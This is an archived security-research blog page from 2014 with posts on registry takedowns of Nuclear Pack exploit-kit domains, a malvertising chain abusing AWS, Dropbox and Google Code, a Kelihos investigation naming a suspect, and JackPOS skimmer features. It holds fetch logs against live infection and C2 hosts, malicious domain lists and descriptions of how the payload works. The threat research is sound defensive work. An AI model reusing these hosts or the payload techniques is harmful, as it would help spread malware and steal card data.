Tuesday, February 25, 2014

Tango Down: The takedown of 209,306 .IN.NET Nuclear Pack DGA domains

This post is the tribute to the hard working invidivuals and professionals who made the impossible happened.

The Report

As one of the result of a persistent collaboration between security researchers and domain registration process. Following the previous suspension effort of Nuclear Pack Exploit Kit domains (link). On behalf of individuals & professionals involved in the process, we dare to announced the suspension process of 209,306 Nuclear Pack domains on TLD: ".IN.NET". Is the biggest Tango Down score in the history of MalwareMustDie.

For the security purpose we can not say much details about this matter yet, except that all of the domains are positively "verdicted" for its involvement in the DGA scheme of the malicious infection toolkit, and are positively confirmed to their preliminary registration investigation suspicious facts beforehand. The bad actor(s) is preparing these domains to serve malware, and the usage of these domains are blocked with the currently spotted active domains are all suspended.

We announced the tango news here to signal the law enforcement and authority to start investigating the listed suspended domains, that contains the data which can be used as cyber crime evidence on malware infection effort through software exploitation by abusing mass .IN.NET internet domains.

The full list of the DGA domains used and the checking report is very long that we can not paste them all here in the post or pastes (yet), but this is the link of the extracted DGA domains -->[here] < Thank you @jedisct1 and Gist!

Good Work Credit

Special thank's for the great cooperation from DOMAINS.IN.NET Team, what a speedy and solid work! It is a very long list but you checked it instantly following to the swift suspension.
The special credit goes to our friend Mr. Frank Denis of OpenDNS for the DGA decoding and its report, our Tango Department leads by Mr. Sachin Raste of eScan, side by side with Mr. Conrad Longmore, Mr. Dhia Mahjoub of OpenDNS and other managers from varied entities that we can not mention you all here, who are actually silently fighting this threat in a tough daily routine, Salud!

The process is not stopping in here. There will be more follow up.

Tweets & Comments


Monday, February 24, 2014

How public services like Amazon AWS, DropBox, Google Project/Code & Google ShortURL got abused to infect malware

Today, I almost went to bed when bumping into this threat. Please kindly bear the sleepy eyes on writing these. I am combining the screenshot and log/details in texts, hopefully there will be no filtration product would block this post for a bit of URL's paste.

This writing contains many points that are important information for fellow friends and the mentioned public services to be aware of being abused by this malware infection session. So I wrote this as fast as possible and leaving payload binary analysis and exploit analysis in a rain check. To anyone who can help to contact the related abuse, is very highly appreciated.

Infection Source:

First of all. The source of infection is the malware infection code/scripts that was implemented in the below IP and domain, located in OVH network, in France, I really hope to have help from France friends to clean this IP from any malware infector toolkits installed:

Secondly, the infector, is starting from Japan's IP under domain: shortening .biz

This needs to be cleaned up too, yet I think there are more infectors exist..

The background

It started when checking a suspicious URL, accessed it in the browser as per below:

I regenerated with the separate scheme to record the below log (for the source of infection details purpose), just to make sure that we had everything in our hands:

--2014-02-24 02:40:02--  h00p://shortening .biz/qnwr
Resolving shortening.biz...
Caching shortening.biz =>
Connecting to shortening.biz||:80... connected.
GET /qnwr HTTP/1.1
Host: shortening.biz
HTTP request sent, awaiting response... 
HTTP/1.1 301 Moved Permanently
Date: Sun, 23 Feb 2014 17:40:03 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e
Location: http://shortening.biz/qnwr/
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
301 Moved Permanently
Registered socket 4 for persistent reuse.
Location: http://shortening.biz/qnwr/ [following]
Skipping 302 bytes of body: [
301 Moved Permanently
Moved Permanently
The document has moved (A HREF="h00p://shortening .biz/qnwr/")here(/A)
Apache/1.3.42 Server at shortening.biz Port 80
] done.
--2014-02-24 02:40:03--  h00p://shortening .biz/qnwr/
GET /qnwr/ HTTP/1.1
Host: shortening.biz
HTTP/1.1 200 OK
Date: Sun, 23 Feb 2014 17:40:03 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e
Last-Modified: Thu, 23 Jan 2014 14:54:18 GMT
ETag: "1135-52e12d1a"
Accept-Ranges: bytes
Content-Length: 4405
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 4405 (4.3K) [text/html]
Saving to: ‘sample.mmd’
100%[=======================================================>] 4,405       --.-K/s   in 0.009s  
2014-02-24 02:40:03 (459 KB/s) - ‘sample.mmd’ saved [4405/4405]
Back to the browser, in the short while the browser's address bar flickering to the redirection URL as per below:

And this act is confirmed by the series of the html tag meta refresh code grepped below:

What happened next? I was being forwarded into a page with video of "a lady in the bed" as per captured below:

I just about to praise on how fortunate I am.. but the video soon got stopped and the warning message came up with popping the download of the Flash Player Setup.. as per shown below:

The Path to Payload

Back to the shell, I simulated the download page for evidence:

And that was giving me the below script actually:

And now we know why I got that redirection, the dropboxusercontent.com (the very bottom link) is serving the infection landing page and I was redirected into it. Will explain this later on. And there are other conditions for another redirection, for the mobile access and Opera browser in the GOO.GL short URL. Anyway if we extract those Short URL for Mobile and Opera browser we'll find the better image:

(I will have to leave other friends to check those two links deeper..)
The further research in the blacklisted URL found the below Amazon AWS abused account (sorted by history) by the same threat:

And this is the malware file downloaded if you are matching to the desired condition:

Now this payload is well detected by AV industry as per shown in VirusTotal result here-->>[link]
If you run the payload you will get the query and response in HTTP as follows:

And this payload is downloading a "config" with the info on hash and URL of another malware, as per shown here:

Here's that "guncel.exe" malware download session in my shell..a simple wget will do..This could be the updates or sort of.

This is the VirusTotal report of the "guncel.exe", is the same file as original payload, it is also as an evidence explaining that the origin of the payload is wjetphp.com (>>[link], the detection rates as the VBA basis Trojan Downloader is not so bad after all, good work.

Below is interesting trace of what this malware did in the memory:

This is just some traces of VBA calls used..(during the creation of registry key)

Quick analysis that might help fellow researchers and infected victims:

The payload will download the background.js JavaScript w/URL planted in the binary, as per traffic below:

Which is having the script as I pasted here-->>[link]
↑You can see clearly the malicious traffic redirection scheme and access URL to the landing page (origin of the infection), in that script..

The next traffic will explain how this background.js is called, the file manifest.json was downloaded, it contains the script to show how background.js is executed by setting several security privileges for the execution of the script itself..

You can see the effort to fake "Google Shockwave Player" (any such product??) upon the execution of background.js above? Things are starting to make much sense on why so many Google related "images" are used here.

PS: I will add some more reversing notes later on, but shall we move on a bit..too little time..for there are more important parts to cover..

What happened if we simulate the landing page access in shell is something like this:

GET /s/pwuh8wdutwot4dg/rezillik.html HTTP/1.1
Host: dl.dropboxusercontent.com
HTTP/1.1 200 OK
accept-ranges: bytes
cache-control: max-age=0
Content-Type: text/html; charset=utf-8
Date: Sun, 23 Feb 2014 21:01:55 GMT
etag: 2n
pragma: public
Server: nginx
x-dropbox-request-id: ecd60af812734360278c876a87176a00
X-RequestId: 6f612d52e7e3c0e526aa4b355328e047
x-server-response-time: 202
Content-Length: 6841
Connection: keep-alive
---response end---
200 OK
Registered socket 4 for persistent reuse.
Length: 6841 (6.7K) [text/html]
Saving to: ‘sample4.mmd’
How I got the payload being downloaded then?? Let's see the code inside the page. Well..It seems like I got hit by the timer function stated by this code:

The Google short URL is again being used to hide the real malware payload URL which is served in the Google Code SVN download!!

The download log can be seen in the follow up section..

Well..the bad guy behind this is really trying hard to convince victim about the Google kind of application is installed :-)

Some reversing & investigation notes

I used recent sample in an abused Google Code SVN here:

The sample is in VT here-->[link]

Straight to the point: A reversing effort showing the CNC masked in binary strings:

The User Name :-))

Maybe we'll need these later, just in case, noted:

"key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRD

Next. Following the trails of that CnC URL, to find the junk used:

Now we can see the code clearly, instead of the PCAP data :-D
See the dates well, the crook was recently modifying the background.js malicious script.
It has the background.js and manifest.json code snipped below:

As per explained way up above, the JSON is used for execution of background.js. We didn't have a a chance to disclose background.js clearly before, so this is it, a fresh one. First, the beautified full code of the bakcground.js is:

If you see what I see, the attacker is aiming Google Chrome browser, by abusing its API (chrome.tabs) to interact with the browser's tab system. You can use this API to create, modify, and rearrange tabs in the browser. Anyway, what he did is on "devtools://" index/tab, he programmed to execute remote script via chrome.tabs.executeScript command to www.saatlikrapor .com/ext/s.php, which this was BAD (gone now-->link and link) in . Either this crook loves Google so much or hates Google that much.. since now we know he is aiming Google chrome browser's end user too.

PS: The saatlikrapor.com domain is hidden behind cloudfare:

;www.saatlikrapor.com.          IN      A

www.saatlikrapor.com.   300     IN      CNAME   saatlikrapor.com.
saatlikrapor.com.       300     IN      A
saatlikrapor.com.       300     IN      A

saatlikrapor.com.       3600    IN      NS      "jeff.ns.cloudflare.com."
saatlikrapor.com.       3600    IN      NS      "lisa.ns.cloudflare.com."

jeff.ns.cloudflare.com. 384     IN      A
lisa.ns.cloudflare.com. 371     IN      A
This is the domain information, a shiny brand new one:
   Registrar: DOMAINSITE, INC.
   Whois Server: whois.domainsite.com
   Referral URL: http://www.domainsite.com
   Status: clientTransferProhibited
   Updated Date: 25-feb-2014
   Creation Date: 25-feb-2014
   Expiration Date: 25-feb-2015

Registrar: DomainSite, Inc.
Registrar IANA ID: 466
Registrar Abuse Contact Email: abuse@domainsite.com
Registrar Abuse Contact Phone: +1.17202492374
Domain Status: addPeriod
Domain Status: clientTransferProhibited
Registrant Name: Whois Agent
Registrant Organization: Whois Privacy Protection Service, Inc.
And how about the CnC used? akillitelefonburada.com ; SAME pattern! :-) behind cloudflare..
;akillitelefonburada.com.       IN      A

akillitelefonburada.com. 300    IN      A
akillitelefonburada.com. 300    IN      A

akillitelefonburada.com. 3600   IN      NS      "jeff.ns.cloudflare.com."
akillitelefonburada.com. 3600   IN      NS      "lisa.ns.cloudflare.com."

jeff.ns.cloudflare.com. 3462    IN      A
lisa.ns.cloudflare.com. 3483    IN      A
And under below registration details:
   Whois Server: whois.nicproxy.com
   Referral URL: http://www.nicproxy.com
   Status: ok
   Updated Date: 12-jan-2014
   Creation Date: 07-jun-2013
   Expiration Date: 07-jun-2014
We will have to deal with the Turkish law enforcement to nail this guy for good:
CREATE DATE: 6/7/2013 11:59:57 AM
UPDATED DATE: 1/12/2014 3:25:26 PM
EXPIRATION DATE: 6/7/2014 11:59:57 AM

owner-organization:Whois Privacy Protection Service.
No, no, it is NOT a hacking site: (Pls don't give me that preach..)
$ curl akillitelefonburada.com
$ curl saatlikrapor.com
$ date
Fri Feb 28 10:10:36 JST 2014


The domain of WJETPHP.COM which was informed in the top section as the "payload center" (red: CNC) also still alive now with the below details:

$ dig WJETPHP.COM any

; <<>> DiG 9.8.5-P1 <<>> WJETPHP.COM any
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 542
;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 0


WJETPHP.COM.  21599 IN NS "mary.ns.cloudflare.COM."
WJETPHP.COM.  21599 IN NS "todd.ns.cloudflare.COM."
WJETPHP.COM.  21599 IN SOA mary.ns.cloudflare.COM. dns.cloudflare.COM. 2014501676 10000 2400 604800 3600

;; Query time: 277 msec
;; WHEN: Sun Mar 09 04:12:37 JST 2014
;; MSG SIZE  rcvd: 137
As you see, he is still hiding his service behind the cloud flare until now (read: cloud flare's customer).

Moreover, the ownership of the domains:

Domain Name: WJETPHP.COM
Registrar: FBS INC.
Whois Server: whois.isimtescil.net
Referral URL: http://www.isimtescil.net
Status: clientTransferProhibited
Updated Date: 01-feb-2014
Creation Date: 24-may-2013
Expiration Date: 24-may-2014
>>> Last update of whois database: Sat, 08 Mar 2014 19:17:39 UTC <<<

Domain Name: WJETPHP.COM
Registry Domain ID:
Registrar WHOIS Server: whois.isimtescil.net
Registrar URL: http://www.isimtescil.net
Updated Date: 24-Jul-2013
Creation Date: 24-May-2013
Registrar Registration Expiration Date: 24-May-2014
Registrar: FBS Inc.
Registrar IANA ID: 1110
Registrar Abuse Contact Email: abuse@domaintime.biz
Registrar Abuse Contact Phone: +902163299393
Domain Status: clientTransferProhibited

URL of the ICANN WHOIS Data Problem Reporting System:
>>>Last update of WHOIS database: 2014-03-08T19:18:12+0000Z<<<
Registration Service Provided By: WWW.ISIMTESCIL.NET


How to conclude this matter generally? Obviously the public well-known internet services was targeted to spread this infection. Let me describe how many of those abused services spotted in this single case:
Number one, amazonaws.com (property of Amazon AWS) is utilised by this actor for the etc bad purpose scheme (see the mobile link and Opera browser link on the above explanation, whatever it is, is not a good thing), we'd better warn Amazon AWS for this link.
Number two is, dropboxusercontent.com (property of Dropbox, Inc) is also utilised to serve payload malware.
Is that all? No. Number three: see the domain in payload URL, googlecode.com, it is the abuse of Google Code's SVN facility.
More? Yes, the last one, number four, goo.gl service, the Google ShortURL is also abused to hide the URL of the malware payload.

The Google code is being abused to serve malware payloads of this threat's series for quite a while, you can view the reports posted by our friend ‏@sarimura (twitter) to the Project Hosting on Google Code in Google groups-->[here]. It shows how persistent the malware actor to always create a new google project and to use its download URL to serve the malware payloads. On the other hand it shows that the bad actor(s) is leaving many traces in Google Code servers during uploading the payloads (account ID, IP addresses, etc).. a hint to follow isn't it?


I share all sample, under usual password, click the picture below to download:

Moral of the story: Our beloved internet and its services are badly abuse by malware. Stay safe please!
PS: Comments and additional are to be added in follow up section! And it looks like this threat is bigger than expected so I could't sleep again, gotta go to day work now!

Updates: How bad the abuse & this malvertisement is?

The bad actor is keep on changing users in AmazonAWS and Google code to serve the next malicious payload.The new abused AmazonAWS page is:
unluvideolari.s3.amazonaws .com/unlu.html URLQuery-->[link]

PoC of how bad the malware download is:

Another PoC:

The recent Google Code SVN that's being abused:

Google set a good work-around by 401 authentication:

Or the 403:

Now Emerging Threat is releasing a signature that can be used to identify this malware download:

Update Info Credit: @sarimura (twitter), signature: Emerging Threat & @node5 (twitter), test & checks: @urlquery (twitter), thank's to Google to keep on nuking down the bad accounts and nice stats of the sort URL.

Follow Up

Great follow, thank's for always fast in responses!


Tuesday, February 18, 2014

Long Talk "AV Tokyo 2013.5" - #Kelihos #CookieBomb #RedKit : Bad Actor's Arrest Request Filed Officially

Sunday, February 16th 2014, on the presentation on AV Tokyo 2013.5, a prestigious security event in Japan (link), we (read: MalwareMustDie, an NPO of Anti Cyber Crime International Research Group) announced the connection between several Cyber Crime actions (malicious abuse of computer exploitation and credential with the usage of malware) of: CookieBomb (IFRAME from the "North") infection (link), Kelihos Botnet infection (link), Spam that lead to malware infection / Malvertisement (link), and the usage of malicious exploitation tool as RedKit/Goon/Infinity for malware infection (link), which is causing series of abusive accusation against the Japan National Cyber Space & Networking Jurisdiction under the following security violation verdicts:
(1) Remote hack on personal computers of national individual/entities
(2) Stealing of credential and privacy property of national individual/entities
(3) 30,000+ malicious code injection by web hacking to national service infrastructure 
(4) Abuse utilization of national computers to distribute malware worldwide.

The presentation video (censored):

The crime, which is currently still in progress for a significant long time with the incremental trend on damage-quantity upon the verdicts stated above, was proven by submitting all of investigation fact and evidence that lead to a One Russia Federation Citizen Individual Crime Suspect (link), where the detail of actor's identification was "beyond any doubt" announced in front of Japan national IT security community, was followed by officially filing all investigation material on category of: National Cyber Crime Abuse and Act of Terrorism aganist National Network, reported to the National Police Agency, Japan - Cyber Force Center, High-Tech Crime Technology Division - Cyber Terror Incident Handling Unit (link). With notifying Information-technology Promotion Agency - Japan (link), JP-CERT/CC (link), Interpol Digital Crime Investigation Support, Europol EC3 (link), and Anti-Phishing Working Group (link), and several European law enforcement agencies related, with witnessed by important national security top-notch researchers.

The fact that has been collected over the investigation time frame, and the unbearable raise of casualty on damage of the crime in progress on the Japan national computer infrastructure was clearly presented to the national security community attendants in the event, and it was urged to raise the serious national security issue against the malicious act of a Russia Federation Individual Citizen (link) who is still performing his daily basis crime activity in abusing Japan national network.

We hope to raise an official request for cooperation from Japan law enforcement to Russia Federation law enforcement to conduct a firm act to stop this crime and terror effort for good. The further delay action from law in Russia Federation against the positive confirmed individual suspect will only prolong the unnecessary damage on victims in Japan soil, not to mention to other countries that has been victimized like Taiwan, India, Ukraine, Georgia, Poland and Russia Federation's victim itself as the top hit of the threat, or, to other countries in Europe that has been abused and used as control center server of this malware activity.

To be noted, Kelihos Botnet infection itself is also spotted infiltrating United States personal computer dial up infrastructure, and the investigation information of the threat with its activity relation to the a notorios spammer (link) and the similarity in identification also was reported accordingly to Federal Bureau of Investigation in United States, which hoping FBI to consider to re-open the legal case against Petr Severa (link) and (link). To all victimized countries of the same threat, we urge you to do the same procedure like we are conducting here in Japan via filing official crime report to be followed and escalated properly by your law enforcement to the Russia Federation law enforcement.

MalwareMustDie,NPO and partners in investigation were in this operation since August 2013, the real identification of the bad actor was revealed in September, 2013 with the collaboration of our crime investigation partner in Russia Federation, GroupIB (link), who was informing us for filing the case to the Russia Federation law enforcement on October, 2013. We revealed the weakness of the botnet in BotConf 2013, December 5th, 2013 in Nantes, France. With as proof of concept in stopping the malware payload and positive ID the CNC owner we did the "takedown" on most of Kelihos botnet CNC between December 1-3, 2013.

#MalwareMustDie, NPO

Thursday, February 13, 2014

Tango Down of Nuclear Pack's 174 Multiple Registered .PW Domains

To "some" fellow researchers: Don't mock for us taking down these bad domains. Think of the victims who get infected in hourly basis! Sorry if we blew your "tracking" objects away. Because of this takedown now the data behind these are ready to be used by the law enforcement to collect.

The background

Following the case on Nuclear Exploit Kit on malware infection via abuse of .PW 2LD domains (initially spotted : to - As the follow up due to the below malicious verdict of the researcher team & friends:

Dynamoo: http://blog.dynamoo.com/2014/02/something-evil-on-3141221131-to.html
Dynamoo: http://blog.dynamoo.com/2014/02/something-evil-on-19295722428.html
Dynamoo: http://blog.dynamoo.com/2014/01/something-evil-on-192951020828.html
Dynamoo: http://blog.dynamoo.com/2014/01/something-evil-on-192951020828.html
Malekal: https://twitter.com/malekal_morte/status/432804655374938112
Umbrella Labs: http://labs.umbrella.com/2014/02/14/when-ips-go-nuclear/
Dhia Mahjoub: http://pastebin.com/QVq2xERk 
To be noted: We are not going to expose any technical evidence for this case in this post. And this post is focusing on the Tango Down effort initiated by the MalwareMustDie, NPO. The details of the Nuclear Pack itself is well-documented for the MMD friends in our public forum as information database of exploitation. (You have to be invited to be a member).

Spotting and following the movement of this threat from:
31 December 2013 until 13 February 2014.
And witnessing the movement of the threat of the same group/actors:
From OVH.COM (France) to: BESTHOSTING.UA (Kiev, Ukraine) at: AS 2655 ref-->> http://bgp.he.net/AS42655
Additional: BESTHOSTING.UA ref-->> https://www.besthosting.ua/en/

Additional information of the threat (to be added) - Thank you URLQuery!

One of the recorded .PW of this verdict in action :
And the current LIVE activity recorded:

The Action and Advisory

We requested the suspension of the total 174 domains with the below stated breakdown, and the suspension was done successfully.

These bad domains are having the same bad actor's route.
The registration information of the domain list stated below is traceable to the positive potential evidence for the ID of the actors that can be used for law enforcement investigation on following this cyber crime case, LE will be needed to directly request via ICANN to Registration entity accordingly.

Any malicious system exploitation and malware infection traffic recorded and logs related to the verdicted domains and its IP Addresses can be used as the evidence of the cyber crime activities, please pass it to your nearest CERT for the further process. The IP recorded in each logs could be still in operation, is a good material for the further monitoring and mitigation of the threat and this post can be used as reference officially. Please be noted of this advisory.

Tango Down

1. Under NAMECHEAP.COM (LA, USA) Registrar (Count: 13) - Status:serverHold:
STATUS: Status:serverHold

$ date && bash check_nonru.sh
Thu Feb 13 20:57:51 JST 2014

ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp
ewrqb,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
fdsgr,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hrebuf,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hrebuff,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hrebufffff,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hrebuqq,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hsfgv,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hsfgvvvv,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
hsfgww,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
jvdsdveeee,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
rrthg,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
rrthh,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
rrthk,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold


2. Under etc Registrar (Count: 73) - Status: Suspension Flag:

$ date && bash check_nonru.sh
Thu Feb 13 20:58:542 JST 2014

ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp

3. Under etc registrar (Count: 88) - Status:serverHold:

$ date && bash check_nonru.sh
Thu Feb 13 20:59:55 JST 2014

ipchk-shell 1.3 FreeBSD version - by @unixfreaxjp
basketballrain,pw,,NS2.POWER-DNS.NET NS1.POWER-DNS.NET Status:serverHold
blankethalftime,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
boomerangfair,pw,,DNS2.OFROADCDNNS.ORG DNS1.OFROADCDNNS.ORG Status:serverHold
championshipgear,pw,,DNS2.MASASJI.COM DNS1.MASASJI.COM Status:serverHold
competitionbunt,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
competitionfencing,pw,,DNS2.MERCHANTMARKETS.COM DNS1.MERCHANTMARKETS.COM Status:serverHold
coughexercise,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
dartboardrunninger,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
decembergear,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
defensebicycle,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
diamondracer,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
discushurdle,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
divemedal,pw,,DNS2.HERMESLABS.COM DNS1.HERMESLABS.COM Status:serverHold
diverbowling,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
divingbaton,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
dodgeballkayaker,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
fielddefense,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
fielderchampion,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
figureskatingpolo,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
fleecegolfing,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
flurriescrew,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
gearcompetitor,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
golfercyclist,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
golfingchampionship,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
golfingorienteering,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
gymnasticsarchery,pw,,DNS2.KOLOMINUTY.COM DNS1.KOLOMINUTY.COM Status:serverHold
halftimedecathlon,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
handballdart,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
highjumpbow,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
hockeybunt,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
huddlecatch,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
hypothermiahuddle,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
jacketgoalie,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
javelinbaton,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
jvdsdvee,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
jvdsdveee,pw,,DNS1.REGISTRAR-SERVERS.COM Status:serverHold
kayakingball,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
lacrossepingpong,pw,,DNS2.MERCHANTMARKETS.COM DNS1.MERCHANTMARKETS.COM Status:serverHold
medaljogger,pw,,DNS2.HERMESLABS.COM DNS1.HERMESLABS.COM Status:serverHold
movemedal,pw,,DNS2.KOLOMINUTY.COM DNS1.KOLOMINUTY.COM Status:serverHold
orienteeringgoalie,pw,,DNS2.MERCHANTMARKETS.COM DNS1.MERCHANTMARKETS.COM Status:serverHold
pitchbiathlon,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
pitchexercise,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
playoffsbronze,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
playoffschampion,pw,,DNS2.HERMESLABS.COM DNS1.HERMESLABS.COM Status:serverHold
polarquarterback,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
quarterbackarena,pw,,DNS2.MERCHANTMARKETS.COM DNS1.MERCHANTMARKETS.COM Status:serverHold
racketrunning,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
radiatorepee,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
relaycompete,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
ridingball,pw,,DNS2.BIGSKYEXPERT.COM DNS1.BIGSKYEXPERT.COM Status:serverHold
runbasketball,pw,,DNS2.KOLOMINUTY.COM DNS1.KOLOMINUTY.COM Status:serverHold
rungymnastics,pw,,DNS2.DECADEMARKETS.COM DNS1.DECADEMARKETS.COM Status:serverHold
runningracer,pw,,NS2.POWER-DNS.NET NS1.POWER-DNS.NET Status:serverHold
thermometergolfer,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
whiteoutdart,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
windchillbiking,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
winterbatter,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
woolchampionship,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold
woolensbicycle,pw,,DNS2.ECHOUNIVERSAL.COM DNS1.ECHOUNIVERSAL.COM Status:serverHold


Thank you: @essachin @ConradLongmore @DhiaLite @abhinavbom @malekal_morte (twitter)


MMD-0016-2014 - The JackPOS Behind the Screen

The background

As the credit for the current threat's awareness, a lot of you probably noticed the JackPOS malware's posted at: Xylit0l's post in Kernel Mode here -->>[kernelmode], in the IntelCrawler press release here -->>[IntelCrawler], and Josh Grunzweig's analysis on Trustwave Spiderlabs here -->>[LINK]

This post is an additional intelligence data supporting to the threat's technicalities written in the main investigation of the threat by the above mentioned gentlemen, it is our shares which may help law enforcement to aim better cannon directly to the bad actors (read: Moronz) who is actively in effort on selling and promoting the threat, the one behind the distribution of JackPOS malware scene.

As per always mentioned in previous posts, we (read: MMD / MalwareMustDie,NPO - Anti CyberCrime & Malware Research Group) work not only in defensive / mitigating way against the threat, but being proactive to spot the root of threat as early stage as possible, and inviting thus support law enforcement & CERT folks to initiate the crime case upon it.

DarkK0de (DK) Crook's Forum

This information was all compiled from our eyes in the DK forum. It was stated the promotion, the testing information, screenshot, latest specification of the JackPOS (furthermore I will refer it as "the product"), the screenshots and the contact information of the bad actor (read: moronz) behind it. I am sorry, after "internal discussion" it was decided not to paste DK forum screenshots itself, since that will raise the risk in blowing away our intelligence channel.

What we posted here may help to add more image & information of the "product" design of JackPOS, to the one that IntelCrawler, Xylit0l & Josh were working hard on analyzing it, in the following sections. To be noted, please understand, we are not adding more technicality details..but adding the campaign product design data, and also we are not aiming fame or riding on the flux of news for this threat. It's just that we did not see the right aim on clues of on-going investigation on the threat's source so far, so this is the share to lead law enforcement friends to aim closer to the target, the right "crook's forum" as the source of this malware campaign: "The DarkK0de".

And for you, the all malware crooks that I know that you're reading this post too, we want to let you know, MMD is different, WE BREATH BEHIND YOUR NECK! and we mean it, no matter how tight your "poor security" environment for a so-called a gathering buff (a.k.a. "forums"? ..whatever..) is. Just STOP NOW your malicious activity before is getting too late! Go and get a decent day work like all of us and live a decent life without fear. Consider this as a warning.

OK, the main course:


What DK was posting screenshots is as per it is:

Admin panel:

Dumps of CreditCard panel

The Bots Control Panel

Promotion Thread

Malware: (functions & specs)

- Coded in modern c++
- Size 145 kbytes (upx packed)
- Small resource usage, ~90% of time 4 mbytes RAM and 0-2% cpu usage
- Doesn‘t use regular expressions
- Grabs track1/track2
- Update / Execute virus
- Process persistence, if process closed, automatically will start again
- Registry persistence, if registry key deleted or changed, it` restored
- Very stable and well tested
- Same track1/track2 won't be sent second time to panel (saved hashed of 
  dumps in a file)
- Once it founds processes with valid data, the virus scrap just them in -
  a loop of 100 times, then rescan all the processes till it finds 
  productive ones. (Done in one thread for stability)

Product Updates:

The new version of virus have some new features that the old one doesn't:

